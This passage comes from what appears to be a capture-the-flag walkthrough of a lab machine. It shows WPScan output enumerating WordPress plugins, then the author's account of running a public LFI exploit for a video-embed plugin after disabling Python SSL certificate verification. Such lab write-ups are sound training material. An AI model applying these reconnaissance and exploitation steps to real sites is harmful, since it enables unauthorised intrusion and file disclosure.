[+] Name: shortcode-ui - v0.6.2
| Latest version: 0.6.2 (up to date) | Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/ | Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/
[+] Name: two-factor
| Latest version: 0.1-dev-20160412 | Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/ | Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/
[+] Finished: Tue Oct 4 20:09:29 2016
[+] Requests Done: 37
[+] Memory used: 32.523 MB
[+] Elapsed time: 00:00:04
This is great! Not only did we find a ton of users (which seem to correlate to the names we found earlier) but we also found a few XSS Vulnerabilities, a Path Traversal Vulnerability and a few plugins that we can use to research for possible vulnerable entry points.
After doing some research, I found out that the advanced-video-embed-embed-videos-or-playlists was vulnerable to a LFI Exploit. Which can be found here!
Upon downloading the exploit, and running it, I was presented with an SSL error… So I went ahead and edited the code to include the following
import ssl ssl._create_default_https_context = ssl._create_unverified_context Once it ran successfully - I navigated to https://192.168.1.13:12380/blogblog/wp-content/uploads/ and was presented with a .jpeg file.